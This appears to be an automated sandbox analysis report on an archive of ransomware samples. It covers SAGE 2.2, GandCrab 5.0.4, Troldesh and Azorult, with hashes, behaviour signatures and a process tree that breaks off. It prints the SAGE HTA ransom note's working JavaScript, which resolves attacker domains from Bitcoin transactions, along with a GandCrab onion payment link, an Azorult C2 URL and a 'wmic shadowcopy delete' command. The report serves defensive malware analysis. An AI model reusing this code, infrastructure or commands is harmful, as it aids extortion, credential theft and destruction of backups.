Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    179s
  • max time network
    180s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240903-en locale:en-us os:windows7-x64 system
  • submitted
    09/11/2024, 19:53

General

  • Target

    RNSM00351.7z

  • Size

    9.5MB

  • MD5

    4bb3a829f62c6cdabb5e5b7621291793

  • SHA1

    51535044c807e9b47bfb858e28b607f4fb34b62e

  • SHA256

    2ff8698b92e09af84ae40c9896b024b9404b26c6836e7ae80acb2d20858cf286

  • SHA512

    9dfe58f110e4cfeaf129e2feaa460de6e751c1b28f61905a3c5312754aaa28cdc33bfe9eac621544743cc7e280ad17c157a7125a6f6184a0b663be49a18d6397

  • SSDEEP

    196608:FPJOrUgKAr501BlA1Np/sKMWD9rjWO4UxiE:FPWJ6lATpsj29ryO4Ux

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\!HELP_SOS.hta

Ransom Note
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Decryption Instructions</title> <HTA:APPLICATION ID='App' APPLICATIONNAME="Decryption Instructions" SCROLL="yes" SINGLEINSTANCE="yes" WINDOWSTATE="maximize"> <style> a { color: #04a; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #222; font-family: "Lucida Sans Unicode", "Lucida Grande", sans-serif; font-size: 12pt; line-height: 16pt; } body, h1 { margin: 0; padding: 0; } h1 { color: #555; text-align: center; padding-bottom: 1.5em; line-height: 1.2; } h2 { color: #555; text-align: center; line-height: 1.2; } ol li { padding-bottom: 13pt; } .container { background-color: #EEE; border: 2pt solid #C7C7C7; margin: 3%; min-width: 600px; padding: 5% 10%; color: #444; } .filecontainer{ padding: 5% 10%; display: none; } .header { border-bottom: 2pt solid #c7c7c7; padding-bottom: 5%; } .hr { background: #bda; display: block; height: 2pt; margin-top: 1.5%; margin-bottom: 1.5%; overflow: hidden; width: 100%; } .key{ background-color: #A1D490; border: 1px solid #506A48; display: block; text-align: center; margin: 0.5em 0; padding: 1em 1.5em; word-wrap: break-word; } .keys{ margin: 3em 0; } .filename{ border: 3px solid #AAA; display: block; text-align: center; margin: 0.5em 0em; padding: 1em 1.5em; background-color: #DCC; } .us{ text-decoration: strong; color: #333; } .info{ background-color: #E4E4E4; padding: 0.5em 3em; margin: 1em 0; } .text{ text-align: justify; } #file{ background-color: #FCC; } .lsb{ display: none; margin: 3%; text-align: center; } .ls{ border: 1px solid #888; border-radius: 3px; padding: 0 0.5em; margin: 0.2em 0.1em; line-height: 2em; display: inline-block; } .ls:hover{ background-color: #D0D0D0; } .l{ display:none; } .lu{ display:none; } </style> <script language="vbscript"> Function GetCmd GetCmd = App.commandLine End Function </script> <script language="javascript"> function openlink(url){ new 
ActiveXObject("WScript.Shell").Run(url); return false; } function aIndexOf(arr, v){ for(var i = 0; i < arr.length; i++) if(arr[i] == v) return i; return -1; } function tweakClass(cl, f){ var els; if(document.getElementByClassName != null){ els = document.getElementsByClassName(cl); } else{ els = []; var tmp = document.getElementsByTagName('*'); for (var i = 0; i < tmp.length; i++){ var c = tmp[i].className; if( (c == cl) || ((c.indexOf(cl) != 1) && ((' '+c+' ').indexOf(' '+cl+' ') != -1)) ) els.push(tmp[i]); } } for(var i = 0; i < els.length; i++) f(els[i]); } function show(el){ el.style.display = 'block'; } function hide(el){ el.style.display = 'none'; } var langs = ["en","de","it","fr","es","no","pt","nl","kr","ms","zh","tr","vi","hi","jv","fa","ar"]; function setLang(lang){ if(aIndexOf(langs, lang) == -1) lang = langs[0]; for(var i = 0; i < langs.length; i++){ var clang = langs[i]; tweakClass('l-'+clang, function(el){ el.style.display = (clang == lang) ? 'block' : 'none'; }); tweakClass('ls-'+clang, function(el){ el.style.backgroundColor = (clang == lang) ? '#BBB' : ''; }); } } function newXHR() { if (window.XMLHttpRequest) return new window.XMLHttpRequest; try { return new ActiveXObject("MSXML2.XMLHTTP.3.0"); } catch(error) { return null; } } function getPage(url, cb) { try{ var xhr = newXHR(); if(!xhr) return cb('no xhr'); xhr.onreadystatechange = function() { if(xhr.readyState != 4) return; if(xhr.status != 200 || !xhr.responseText) return cb(xhr.status) cb(null, xhr.responseText); }; xhr.open("GET", url+((url.indexOf('?') == -1) ? "?" 
: "&") + "_=" + new Date().getTime(), true); xhr.send(); } catch(e){ cb(e); } } function decodeTxString(hex){ var m = '0123456789abcdef'; var s = ''; var c = 0xAA; hex = hex.toLowerCase(); for(var i = 0; i < hex.length; i+=2){ var a = m.indexOf(hex.charAt(i)); var b = m.indexOf(hex.charAt(i+1)); if(a == -1 || b == -1) throw hex[i]+hex[i+1]+' '+a+' '+b; s+= String.fromCharCode(c = (c ^ ((a << 4) | b))); } return s; } var OR = 'OP_RE'+'TURN '; var sources = [ {bp:'btc.b'+'lockr.i'+'o/api/v1/', txp:'tx/i'+'nfo/', adp:'add'+'ress/txs/', ptxs: function(json){ if(json.status != 'success') return null; var res = []; for(var i = 0; i < json.data.txs.length - 1; i++) res.push(json.data.txs[i].tx); return res; }, ptx: function(json){ if(json.status != 'success') return null; var os = json.data.vouts; for(var i = 0; i < os.length; i++) if(os[i].extras.asm.indexOf(OR) == 0) return decodeTxString(os[i].extras.asm.substr(10)); return null; } }, {bp:'ch'+'ain.s'+'o/api/v2/', txp:'get_t'+'x_out'+'puts/btc/', adp:'get_tx_uns'+'pent/btc/', ptxs: function(json){ if(json.status != 'success') return null; var res = []; for(var i = json.data.txs.length - 1; i >= 0; i--) res.push(json.data.txs[i].txid); return res; }, ptx: function(json){ if(json.status != 'success') return null; var os = json.data.outputs; for(var i = 0; i < os.length; i++) if(os[i].script.indexOf(OR) == 0) return decodeTxString(os[i].script.substr(10)); return null; } }, {bp:'bit'+'aps.co'+'m/api/', txp:'trans'+'action/', adp:'ad'+'dress/tra'+'nsactions/', adpb:'/0/sen'+'t/all', ptxs: function(json){ var res = []; for(var i = 0; i < json.length; i++) res.push(json[i][1]); return res; }, ptx: function(json){ var os = json.output; for(var i = 0; i < os.length; i++) if(os[i].script.asm.indexOf(OR) == 0) return decodeTxString(os[i].script.asm.substr(10)); return null; } }, {bp:'api.b'+'lockcyp'+'her.com/v1/b'+'tc/main/', txp:'txs/', adp:'addrs/', ptxs: function(json){ var res = []; var m = {}; for(var i = 0; i < 
json.txrefs.length; i++){ var tx = json.txrefs[i].tx_hash; if(m[tx]) continue; m[tx] = 1; res.push(tx); } return res; }, ptx: function(json){ var os = json.outputs; for(var i = 0; i < os.length; i++) if(os[i].data_hex != null) return decodeTxString(os[i].data_hex); return null; } } ]; function eachUntil(a,f,c){ var i = 0; var n = function(){ if(i >= a.length) return c('f'); f(a[i++], function(err, res){ if(err == null) return c(null, res); n(); }); }; n(); } function getJson(url, cb){ getPage(url, function(err, res){ if(err != null) return cb(err); var json; try{ if(window.JSON && window.JSON.parse){ json = window.JSON.parse(res); } else{ json = eval('('+res+')'); } } catch(e){ cb(e); } cb(null, json); }); } function getDomains(ad, cb){ eachUntil(sources, function(s, cb){ var url = 'http://'+s.bp; url+= s.adp+ad; if(s.adpb) url+= s.adpb; getJson(url, function(err, json){ if(err != null) return cb(err); try{ cb(null, s.ptxs(json)); } catch(e){ cb(e); } }); }, function(err, txs){ if(err != null) return cb(err); if(txs.length == 0) return cb('f'); eachUntil(txs, function(tx, cb){ eachUntil(sources, function(s, cb){ var url = 'http://'+s.bp+s.txp+tx; getJson(url, function(err, json){ if(err != null) return cb(err); try{ cb(null, s.ptx(json)); } catch(e){ cb(e); } }); }, function(err, res){ if(err != null) return cb(err); if(res == null) return cb('f'); cb(null, res.split(':')); }); }, cb); }); } function updateLinks(){ tweakClass('lu', hide); tweakClass('lu-updating', show); getDomains('1783wBG'+'sr'+'1zkxenfE'+'ELXA25PLSkL'+'dfJ4B7', function(err, ds){ tweakClass('lu', hide); if(err != null){ tweakClass('lu-error', show); return; } tweakClass('lu-done', show); var html = ''; for(var i = 0; i < ds.length; i++) html+= '<div class="key"><a href="http://7gie6ffnkrjykggd.'+ds[i]+'/login/AU5ZJKVBfs2PF0RWUpkrVT3Z8o5P5Prvx9YTdJYEG89ZeLa--f55lS3A" onclick="javascript:return openlink(this.href)">http://7gie6ffnkrjykggd.'+ds[i]+'/</a></div>'; tweakClass('links', function(el){ 
el.innerHTML = html; }); }); return false; } function onPageLoaded(){ try{ tweakClass('lsb', show); }catch(e){} try{ tweakClass('lu-orig', show); }catch(e){} try{ setLang('en'); }catch(e){} try{ var args = GetCmd().match(/"[^"]+"|[^ ]+/g); if(args.length > 1){ var file = args[args.length-1]; if(file.charAt(0) == '"' && file.charAt(file.length-1) == '"') file = file.substr(1, file.length-2); document.getElementById('filename').innerHTML = file; show(document.getElementById('file')); document.title = 'File is encrypted'; } }catch(e){} } </script> </head> <body onload='javascript:onPageLoaded()'> <div class='lsb'> <span class='ls ls-en' onclick="javascript:return setLang('en')">English</span> <span class='ls ls-de' onclick="javascript:return setLang('de')">Deutsch</span> <span class='ls ls-it' onclick="javascript:return setLang('it')">Italiano</span> <span class='ls ls-fr' onclick="javascript:return setLang('fr')">Français</span> <span class='ls ls-es' onclick="javascript:return setLang('es')">Español</span> <span class='ls ls-no' onclick="javascript:return setLang('no')">Norsk</span> <span class='ls ls-pt' onclick="javascript:return setLang('pt')">Português</span> <span class='ls ls-nl' onclick="javascript:return setLang('nl')">Nederlands</span> <br/><span class='ls ls-kr' onclick="javascript:return setLang('kr')">한국어</span> <span class='ls ls-ms' onclick="javascript:return setLang('ms')">Bahasa Melayu</span> <span class='ls ls-zh' onclick="javascript:return setLang('zh')">中文</span> <span class='ls ls-tr' onclick="javascript:return setLang('tr')">Türkçe</span> <span class='ls ls-vi' onclick="javascript:return setLang('vi')">Tiếng Việt</span> <span class='ls ls-hi' onclick="javascript:return setLang('hi')">हिन्दी</span> <span class='ls ls-jv' onclick="javascript:return setLang('jv')">Basa Jawa</span> <span class='ls ls-fa' onclick="javascript:return setLang('fa')">فارسی</span> <span class='ls ls-ar' onclick="javascript:return setLang('ar')">العربية</span> </div> <div 
id='file' class='container filecontainer'> <div class='filename'> <div style='float:left; padding:18px 0'><img src="data:image/png;base64,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" style='padding:0 7.5px'/></div> <div> <h2 class='l l-en' style='display:block'>The file is encrypted but can be restored</h2><h2 class='l l-de' >Die Datei ist verschlüsselt, aber kann wiederhergestellt werden</h2><h2 class='l l-it' >Il file è crittografato, ma può essere ripristinato</h2><h2 class='l l-fr' >Le fichier est crypté mais peut être restauré</h2><h2 class='l l-es' >El archivo está encriptado pero puede ser restaurado</h2><h2 class='l l-no' >Filen er kryptert men kan bli gjenopprettet</h2><h2 class='l l-pt' >O arquivo está criptografado, mas poderá ser descriptografado</h2><h2 class='l l-nl' >Het bestand is versleuteld maar kan worden hersteld</h2><h2 class='l l-kr' >파일은 암호화되었지만 복원 할 수 있습니다</h2><h2 class='l l-ms' >Fail ini dienkripsikan tetapi boleh dipulih semula.</h2><h2 class='l l-zh' >文件已被加密,但是可以解密</h2><h2 class='l l-tr' >Dosya şifrelenmiş ancak geri yüklenebilir.</h2><h2 class='l l-vi' >Tập tin bị mã hóa nhưng có thể được khôi phục</h2><h2 class='l l-hi' >फाइल एनक्रिप्‍टड हैं लेकिन रिस्‍टोर की जा सकती हैं</h2><h2 class='l l-jv' >File ini dienkripsi tetapi dapat dikembalikan</h2><h2 class='l l-fa' >این فایل رمزگذاری شده است اما می تواند بازیابی شود</h2><h2 class='l l-ar' > الملف مشفر لكن من الممكن إسترجاعه </h2> <p><span id='filename'></span></p> </div> </div> <h2 class='l l-en' style='display:block'>The file you tried to open and other important files on your computer were encrypted by "SAGE 2.2 Ransomware".</h2><h2 class='l l-de' >Die Datei, die Sie öffnen wollten, und andere wichtige Dateien auf ihrem Computer wurden von "SAGE 2.2 Ransomware" verschlüsselt.</h2><h2 class='l l-it' >Il file che hai tentato di aprire e altri file importanti del tuo computer sono stati crittografati da "SAGE 2.2 Ransomware".</h2><h2 class='l l-fr' > Le fichier que vous essayez 
d’ouvrir et d’autres fichiers importants sur votre ordinateur ont été cryptés par "SAGE 2.2 Ransomware".</h2><h2 class='l l-es' >El archivo que intentó abrir y otros importantes archivos en su computadora fueron encriptados por "SAGE 2.2 Ransomware".</h2><h2 class='l l-no' >Filen du prøvde åpne og andre viktige filer på datamaskinen din ble kryptert av "SAGE 2.2 Ransomware".</h2><h2 class='l l-pt' >O arquivo que você está tentando acessar está criptografado, outros arquivos importantes em seu computador também foram criptografados por "SAGE 2.2 Ransomware".</h2><h2 class='l l-nl' >Het bestand dat je probeert te openen en andere belangrijke bestanden op je computer zijn beveiliged door "SAGE 2.2 Ransomware".</h2><h2 class='l l-kr' >컴퓨터에서 여는 파일 및 기타 중요한 파일은 "SAGE 2.2 Ransomware"에 의해 암호화되었습니다.</h2><h2 class='l l-ms' >Fail yang anda cuba buka dan fail penting yang lain di komputer anda telah dienkripskan oleh "SAGE 2.2 Ransomware".</h2><h2 class='l l-zh' >您试图打开的文件以及您计算机上的其它文件已经用"SAGE 2.2 Ransomware"进行了加密。</h2><h2 class='l l-tr' >Açmaya çalıştığınız dosya ve diğer önemli dosyalarınızı bilgisayarınızda "SAGE 2.2 Ransomware" tarafından şifrelenmiş.</h2><h2 class='l l-vi' >Tập tin mà bạn cố mở và những tập tin quan trọng khác trên máy tính của bạn bị mã hóa bởi "SAGE 2.2 Ransomware".</h2><h2 class='l l-hi' >वो फाइल जिसे आपने खोलने की कोशिश की और आपके कंप्‍यूटर पर बाकी महत्‍वपूर्ण फाइले हमारी ओर से इंक्रिप्टिड की गई हैं "SAGE 2.2 Ransomware"।</h2><h2 class='l l-jv' >File yang Anda coba untuk buka dan file penting lain di komputer Anda yang dienkripsi oleh "SAGE 2.2 Ransomware".</h2><h2 class='l l-fa' >فایلی که ش�
URLs

http://'+s.bp

http://'+s.bp+s.txp+tx

Extracted

Family

azorult

C2

http://uspool.softopia.site/vvv/index.php

Extracted

Path

F:\XK\KWNLVP-DECRYPT.txt

Ransom Note
---= GANDCRAB V5.0.4 =--- ***********************UNDER NO CIRCUMSTANCES DO NOT DELETE THIS FILE, UNTIL ALL YOUR DATA IS RECOVERED*********************** *****FAILING TO DO SO, WILL RESULT IN YOUR SYSTEM CORRUPTION, IF THERE ARE DECRYPTION ERRORS***** Attention! All your files, documents, photos, databases and other important files are encrypted and have the extension: .KWNLVP The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. The server with your key is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- | 0. Download Tor browser - https://www.torproject.org/ | 1. Install Tor browser | 2. Open Tor Browser | 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/2c76df95dab1943c | 4. Follow the instructions on this page ---------------------------------------------------------------------------------------- On our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. ATTENTION! IN ORDER TO PREVENT DATA DAMAGE: * DO NOT MODIFY ENCRYPTED FILES * DO NOT CHANGE DATA BELOW ---BEGIN GANDCRAB KEY--- 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 ---END GANDCRAB KEY--- ---BEGIN PC DATA--- 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 ---END PC DATA---
URLs

http://gandcrabmfe6mnef.onion/2c76df95dab1943c

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Azorult family
  • Gandcrab

    Gandcrab is a Trojan horse that encrypts files on a computer.

  • Gandcrab family
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Mimikatz family
  • Modifies WinLogon for persistence 2 TTPs 5 IoCs
  • Modifies visibility of file extensions in Explorer 2 TTPs 2 IoCs
  • Modifies visibility of hidden/system files in Explorer 2 TTPs 2 IoCs
  • Troldesh family
  • Troldesh, Shade, Encoder.858

    Troldesh is a ransomware spread by malspam.

  • UAC bypass 3 TTPs 3 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Renames multiple (397) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Renames multiple (8653) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • mimikatz is an open source tool to dump credentials on Windows 1 IoCs
  • Disables RegEdit via registry modification 3 IoCs
  • Disables Task Manager via registry modification
  • Disables cmd.exe use via registry modification 1 IoCs
  • Disables use of System Restore points 1 TTPs
  • Drops file in Drivers directory 2 IoCs
  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 39 IoCs
  • Loads dropped DLL 54 IoCs
  • Modifies system executable filetype association 2 TTPs 15 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 31 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops desktop.ini file(s) 42 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Installs/modifies Browser Helper Object 2 TTPs 13 IoCs

    BHOs are DLL modules which act as plugins for Internet Explorer.

  • Modifies WinLogon 2 TTPs 1 IoCs
  • AutoIT Executable 15 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 41 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • UPX packed file 24 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 54 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 3 TTPs 3 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Control Panel 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
  • Modifies Internet Explorer start page 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 4 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 13 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 60 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 22 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 13 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00351.7z"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:2124
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:2756
  • C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2504
    • C:\Users\Admin\Desktop\00351\HEUR-Trojan-Ransom.MSIL.Blocker.gen-8b4124c4edcec6b198bf7b21c51f4fe74378cd7013eb257b685b5d01004680fa.exe
      HEUR-Trojan-Ransom.MSIL.Blocker.gen-8b4124c4edcec6b198bf7b21c51f4fe74378cd7013eb257b685b5d01004680fa.exe
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Modifies system certificate store
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      PID:2528
      • C:\Users\Admin\Desktop\00351\HEUR-Trojan-Ransom.MSIL.Blocker.gen-8b4124c4edcec6b198bf7b21c51f4fe74378cd7013eb257b685b5d01004680fa.exe
        "HEUR-Trojan-Ransom.MSIL.Blocker.gen-8b4124c4edcec6b198bf7b21c51f4fe74378cd7013eb257b685b5d01004680fa.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:1912
    • C:\Users\Admin\Desktop\00351\HEUR-Trojan-Ransom.MSIL.GandCrypt.gen-f13e1c0c318f95b1cae88b102f5d02a890d86dac524921ef67c7837d1e916d5c.exe
      HEUR-Trojan-Ransom.MSIL.GandCrypt.gen-f13e1c0c318f95b1cae88b102f5d02a890d86dac524921ef67c7837d1e916d5c.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Modifies system certificate store
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      PID:1576
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        3⤵
        • Loads dropped DLL
        • Enumerates connected drives
        • Sets desktop wallpaper using registry
        • Drops file in Program Files directory
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Modifies system certificate store
        PID:1108
        • C:\Windows\SysWOW64\shell.exe
          "C:\Windows\system32\shell.exe" "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
          4⤵
          • Executes dropped EXE
          • Drops file in System32 directory
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          PID:2588
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2588 -s 256
            5⤵
            • Loads dropped DLL
            • Program crash
            PID:2220
            • C:\Windows\SysWOW64\Shell.exe
              "C:\Windows\system32\Shell.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of SetWindowsHookEx
              PID:1972
            • C:\Windows\SysWOW64\Shell.exe
              "C:\Windows\system32\Shell.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of SetWindowsHookEx
              PID:2092
    • C:\Users\Admin\Desktop\00351\Trojan-Ransom.MSIL.Agent.gox-38f147154c31dfd83a34715aab76173667e18b6671f2e0c0c878b018c2e4f00c.exe
      Trojan-Ransom.MSIL.Agent.gox-38f147154c31dfd83a34715aab76173667e18b6671f2e0c0c878b018c2e4f00c.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:2492
    • C:\Users\Admin\Desktop\00351\Trojan-Ransom.Win32.Blocker.kpuo-9071d7890a075cf96303d8ff961d8e61deca500d24f295cfc1cbcd98e37a7816.exe
      Trojan-Ransom.Win32.Blocker.kpuo-9071d7890a075cf96303d8ff961d8e61deca500d24f295cfc1cbcd98e37a7816.exe
      2⤵
      • Modifies WinLogon for persistence
      • Modifies visibility of file extensions in Explorer
      • Modifies visibility of hidden/system files in Explorer
      • Disables RegEdit via registry modification
      • Executes dropped EXE
      • Loads dropped DLL
      • Modifies system executable filetype association
      • Adds Run key to start application
      • Drops desktop.ini file(s)
      • Enumerates connected drives
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies Control Panel
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      • System policy modification
      PID:2524
      • C:\Windows\xk.exe
        C:\Windows\xk.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:2720
      • C:\Windows\SysWOW64\IExplorer.exe
        C:\Windows\system32\IExplorer.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:1648
      • C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE
        "C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:1604
      • C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE
        "C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:2848
      • C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE
        "C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:2136
      • C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE
        "C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:2360
      • C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE
        "C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:1856
      • C:\Windows\xk.exe
        C:\Windows\xk.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:2240
      • C:\Windows\SysWOW64\IExplorer.exe
        C:\Windows\system32\IExplorer.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:1824
      • C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE
        "C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:636
      • C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE
        "C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:1720
      • C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE
        "C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:3028
      • C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE
        "C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:1972
      • C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE
        "C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:2936
    • C:\Users\Admin\Desktop\00351\Trojan-Ransom.Win32.Blocker.kwow-d8f41f560677a87dc582d546e62769e033732bd25c75bf05a93094bf34ddc647.exe
      Trojan-Ransom.Win32.Blocker.kwow-d8f41f560677a87dc582d546e62769e033732bd25c75bf05a93094bf34ddc647.exe
      2⤵
      • UAC bypass
      • Drops file in Drivers directory
      • Drops startup file
      • Executes dropped EXE
      • Loads dropped DLL
      • Adds Run key to start application
      • Checks whether UAC is enabled
      • Drops desktop.ini file(s)
      • Enumerates connected drives
      • Installs/modifies Browser Helper Object
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Modifies Internet Explorer start page
      • Modifies registry class
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      • System policy modification
      PID:2556
      • C:\Users\Admin\Desktop\00351\Trojan-Ransom.Win32.Blocker.kwow-d8f41f560677a87dc582d546e62769e033732bd25c75bf05a93094bf34ddc647.exe
        C:\Users\Admin\Desktop\00351\Trojan-Ransom.Win32.Blocker.kwow-d8f41f560677a87dc582d546e62769e033732bd25c75bf05a93094bf34ddc647.exe /nstart
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2796
      • C:\Users\Admin\AppData\Local\Temp\nhgqubm.exe
        C:\Users\Admin\AppData\Local\Temp\nhgqubm.exe /HomeRegAccess10
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:2484
      • C:\Windows\system32\Rundll32.exe
        Rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 C:\Users\Admin\AppData\Local\Temp\~ugdhcvr.inf
        3⤵
